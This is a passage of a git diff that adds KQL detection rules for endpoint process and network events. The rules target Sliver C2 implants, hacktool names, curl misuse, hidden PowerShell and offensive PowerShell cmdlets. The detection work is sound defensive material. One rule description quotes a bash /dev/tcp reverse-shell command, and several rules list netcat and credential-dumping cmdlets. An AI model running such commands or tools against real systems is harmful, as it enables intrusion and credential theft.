networking limitations. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1210 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -Inject " and (ProcessCommandLine contains " -PayloadArgs " or ProcessCommandLine contains " -PayloadFile ")) or ((ProcessCommandLine contains " approve " or ProcessCommandLine contains " create " or ProcessCommandLine contains " check " or ProcessCommandLine contains " delete ") and (ProcessCommandLine contains " /payload:" or ProcessCommandLine contains " /payload=" or ProcessCommandLine contains " /updateid:" or ProcessCommandLine contains " /updateid=")) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql b/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql new file mode 100644 index 00000000..94238395 --- /dev/null +++ b/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Sliver C2 Implant Activity Pattern +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-08-25 +// Level: critical +// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8" \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_stracciatella_execution.kql b/KQL/rules/Execution/hacktool_stracciatella_execution.kql new file mode 100644 index 00000000..67bc7020 --- /dev/null +++ b/KQL/rules/Execution/hacktool_stracciatella_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Stracciatella Execution +// Author: pH-T (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") \ No newline at end of file diff --git a/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..4af545e9 --- /dev/null +++ b/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Hardware Model Reconnaissance Via Wmic.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, car.2016-03-002 + +DeviceProcessEvents +| where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql b/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql new file mode 100644 index 00000000..dbf7b375 --- /dev/null +++ b/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql @@ -0,0 +1,12 @@ +// Title: Hidden Powershell in Link File Pattern +// Author: frack113 +// Date: 2022-02-06 +// Level: medium +// Description: Detects events that appear when a user click on a link file with a powershell command in it +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Legitimate commands in .lnk files + +DeviceProcessEvents +| where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql new file mode 100644 index 00000000..fb234fca --- /dev/null +++ b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql @@ -0,0 +1,11 @@ +// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-05 +// Level: high +// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0" \ No newline at end of file diff --git a/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql b/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql new file mode 100644 index 00000000..b38af5a6 --- /dev/null +++ b/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql @@ -0,0 +1,10 @@ +// Title: Import PowerShell Modules From Suspicious Directories - ProcCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-10 +// Level: medium +// Description: Detects powershell scripts that import modules from suspicious directories +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\" \ No newline at end of file diff --git a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql new file mode 100644 index 00000000..a2c06cf5 --- /dev/null +++ b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql @@ -0,0 +1,11 @@ +// Title: Inline Python Execution - Spawn Shell Via OS System Library +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -c " and ProcessCommandLine contains "os.system(")) and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) \ No newline at end of file diff --git a/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql b/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql new file mode 100644 index 00000000..a30299b8 --- /dev/null +++ b/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql @@ -0,0 +1,12 @@ +// Title: Insecure Proxy/DOH Transfer Via Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: medium +// Description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Access to badly maintained internal or development systems + +DeviceProcessEvents +| where (ProcessCommandLine contains "--doh-insecure" or ProcessCommandLine contains "--proxy-insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql b/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql new file mode 100644 index 00000000..d98ec616 --- /dev/null +++ b/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql @@ -0,0 +1,12 @@ +// Title: Insecure Transfer Via Curl.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-30 +// Level: medium +// Description: Detects execution of "curl.exe" with the "--insecure" flag. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Access to badly maintained internal or development systems + +DeviceProcessEvents +| where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql new file mode 100644 index 00000000..cce61814 --- /dev/null +++ b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql @@ -0,0 +1,14 @@ +// Title: Installation of WSL Kali-Linux +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-10 +// Level: high +// Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL). +Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams + +DeviceProcessEvents +| where (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl") and (ProcessCommandLine contains " --install " or ProcessCommandLine contains " -i ") and ProcessCommandLine contains "kali" \ No newline at end of file diff --git a/KQL/rules/Execution/interactive_bash_suspicious_children.kql b/KQL/rules/Execution/interactive_bash_suspicious_children.kql new file mode 100644 index 00000000..39f937fb --- /dev/null +++ b/KQL/rules/Execution/interactive_bash_suspicious_children.kql @@ -0,0 +1,12 @@ +// Title: Interactive Bash Suspicious Children +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-14 +// Level: medium +// Description: Detects suspicious interactive bash as a parent to rather uncommon child processes +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059.004, attack.t1036 +// False Positives: +// - Legitimate software that uses these patterns + +DeviceProcessEvents +| where InitiatingProcessCommandLine =~ "bash -i" and ((ProcessCommandLine contains "-c import " or ProcessCommandLine contains "base64" or ProcessCommandLine contains "pty.spawn") or (FolderPath endswith "whoami" or FolderPath endswith "iptables" or FolderPath endswith "/ncat" or FolderPath endswith "/nc" or FolderPath endswith "/netcat")) \ No newline at end of file diff --git a/KQL/rules/Execution/jamf_mdm_execution.kql b/KQL/rules/Execution/jamf_mdm_execution.kql new file mode 100644 index 00000000..ed6614e6 --- /dev/null +++ b/KQL/rules/Execution/jamf_mdm_execution.kql @@ -0,0 +1,13 @@ +// Title: JAMF MDM Execution +// Author: Jay Pandit +// Date: 2023-08-22 +// Level: low +// Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices. + +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate use of the JAMF CLI tool by IT support and administrators + +DeviceProcessEvents +| where (ProcessCommandLine contains "createAccount" or ProcessCommandLine contains "manage" or ProcessCommandLine contains "removeFramework" or ProcessCommandLine contains "removeMdmProfile" or ProcessCommandLine contains "resetPassword" or ProcessCommandLine contains "setComputerName") and FolderPath endswith "/jamf" \ No newline at end of file diff --git a/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql b/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql new file mode 100644 index 00000000..27fa185e --- /dev/null +++ b/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql @@ -0,0 +1,12 @@ +// Title: JAMF MDM Potential Suspicious Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-22 +// Level: medium +// Description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly + +DeviceProcessEvents +| where (FolderPath endswith "/bash" or FolderPath endswith "/sh") and InitiatingProcessFolderPath endswith "/jamf" \ No newline at end of file diff --git a/KQL/rules/Execution/java_running_with_remote_debugging.kql b/KQL/rules/Execution/java_running_with_remote_debugging.kql new file mode 100644 index 00000000..c15627fc --- /dev/null +++ b/KQL/rules/Execution/java_running_with_remote_debugging.kql @@ -0,0 +1,10 @@ +// Title: Java Running with Remote Debugging +// Author: Florian Roth (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect +// MITRE Tactic: Execution +// Tags: attack.t1203, attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost"))) \ No newline at end of file diff --git a/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql b/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql new file mode 100644 index 00000000..12d4123c --- /dev/null +++ b/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql @@ -0,0 +1,10 @@ +// Title: JXA In-memory Execution Via OSAScript +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects possible malicious execution of JXA in-memory via OSAScript +// MITRE Tactic: Execution +// Tags: attack.t1059.002, attack.t1059.007, attack.execution + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -l " and ProcessCommandLine contains "JavaScript") or ProcessCommandLine contains ".js") and (ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "eval" and ProcessCommandLine contains "NSData.dataWithContentsOfURL") \ No newline at end of file diff --git a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql new file mode 100644 index 00000000..b9b0338a --- /dev/null +++ b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql @@ -0,0 +1,14 @@ +// Title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux +// Author: Milad Cheraghi +// Date: 2025-10-18 +// Level: high +// Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. +This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1562.001 +// False Positives: +// - System administrator manually stopping Kaspersky services + +DeviceProcessEvents +| where (ProcessCommandLine contains "stop" and ProcessCommandLine contains "kesl") and (FolderPath endswith "/systemctl" or FolderPath endswith "/bash" or FolderPath endswith "/sh") \ No newline at end of file diff --git a/KQL/rules/Execution/linux_hacktool_execution.kql b/KQL/rules/Execution/linux_hacktool_execution.kql new file mode 100644 index 00000000..f8b705fa --- /dev/null +++ b/KQL/rules/Execution/linux_hacktool_execution.kql @@ -0,0 +1,12 @@ +// Title: Linux HackTool Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure]) +// Date: 2023-01-03 +// Level: high +// Description: Detects known hacktool execution based on image name. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.resource-development, attack.t1587 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath contains "/cobaltstrike" or FolderPath contains "/teamserver") or (FolderPath endswith "/crackmapexec" or FolderPath endswith "/havoc" or FolderPath endswith "/merlin-agent" or FolderPath endswith "/merlinServer-Linux-x64" or FolderPath endswith "/msfconsole" or FolderPath endswith "/msfvenom" or FolderPath endswith "/ps-empire server" or FolderPath endswith "/ps-empire" or FolderPath endswith "/sliver-client" or FolderPath endswith "/sliver-server" or FolderPath endswith "/Villain.py") or (FolderPath endswith "/aircrack-ng" or FolderPath endswith "/bloodhound-python" or FolderPath endswith "/bpfdos" or FolderPath endswith "/ebpfki" or FolderPath endswith "/evil-winrm" or FolderPath endswith "/hashcat" or FolderPath endswith "/hoaxshell.py" or FolderPath endswith "/hydra" or FolderPath endswith "/john" or FolderPath endswith "/ncrack" or FolderPath endswith "/nxc-ubuntu-latest" or FolderPath endswith "/pidhide" or FolderPath endswith "/pspy32" or FolderPath endswith "/pspy32s" or FolderPath endswith "/pspy64" or FolderPath endswith "/pspy64s" or FolderPath endswith "/setoolkit" or FolderPath endswith "/sqlmap" or FolderPath endswith "/writeblocker") or FolderPath contains "/linpeas" or (FolderPath endswith "/autorecon" or FolderPath endswith "/httpx" or FolderPath endswith "/legion" or FolderPath endswith "/naabu" or FolderPath endswith "/netdiscover" or FolderPath endswith "/nuclei" or FolderPath endswith "/recon-ng") or FolderPath contains "/sniper" or (FolderPath endswith "/dirb" or FolderPath endswith "/dirbuster" or FolderPath endswith "/eyewitness" or FolderPath endswith "/feroxbuster" or FolderPath endswith "/ffuf" or FolderPath endswith "/gobuster" or FolderPath endswith "/wfuzz" or FolderPath endswith "/whatweb") or (FolderPath endswith "/joomscan" or FolderPath endswith "/nikto" or FolderPath endswith "/wpscan") \ No newline at end of file diff --git a/KQL/rules/Execution/linux_reverse_shell_indicator.kql b/KQL/rules/Execution/linux_reverse_shell_indicator.kql new file mode 100644 index 00000000..e5fc34bb --- /dev/null +++ b/KQL/rules/Execution/linux_reverse_shell_indicator.kql @@ -0,0 +1,10 @@ +// Title: Linux Reverse Shell Indicator +// Author: Florian Roth (Nextron Systems) +// Date: 2021-10-16 +// Level: critical +// Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "/bin/bash" and (not((RemoteIP in~ ("127.0.0.1", "0.0.0.0")))) \ No newline at end of file diff --git a/KQL/rules/Execution/local_file_read_using_curl_exe.kql b/KQL/rules/Execution/local_file_read_using_curl_exe.kql new file mode 100644 index 00000000..3c3dfdb4 --- /dev/null +++ b/KQL/rules/Execution/local_file_read_using_curl_exe.kql @@ -0,0 +1,10 @@ +// Title: Local File Read Using Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: medium +// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql b/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql new file mode 100644 index 00000000..2f25ae74 --- /dev/null +++ b/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql @@ -0,0 +1,10 @@ +// Title: Logged-On User Password Change Via Ksetup.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-06 +// Level: medium +// Description: Detects password change for the logged-on user's via "ksetup.exe" +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql b/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql new file mode 100644 index 00000000..ef949b8f --- /dev/null +++ b/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql @@ -0,0 +1,12 @@ +// Title: MacOS Scripting Interpreter AppleScript +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-21 +// Level: medium +// Description: Detects execution of AppleScript of the macOS scripting language AppleScript. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.002 +// False Positives: +// - Application installers might contain scripts as part of the installation process. + +DeviceProcessEvents +| where (ProcessCommandLine contains " -e " or ProcessCommandLine contains ".scpt" or ProcessCommandLine contains ".js") and FolderPath endswith "/osascript" \ No newline at end of file diff --git a/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql b/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql new file mode 100644 index 00000000..37f72b9e --- /dev/null +++ b/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql @@ -0,0 +1,10 @@ +// Title: Malicious Base64 Encoded PowerShell Keywords in Command Lines +// Author: John Lambert (rule) +// Date: 2019-01-16 +// Level: high +// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains "lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains "AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql new file mode 100644 index 00000000..ae7cddf5 --- /dev/null +++ b/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql @@ -0,0 +1,10 @@ +// Title: Malicious PowerShell Commandlets - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: high +// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks +// MITRE Tactic: Execution +// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains 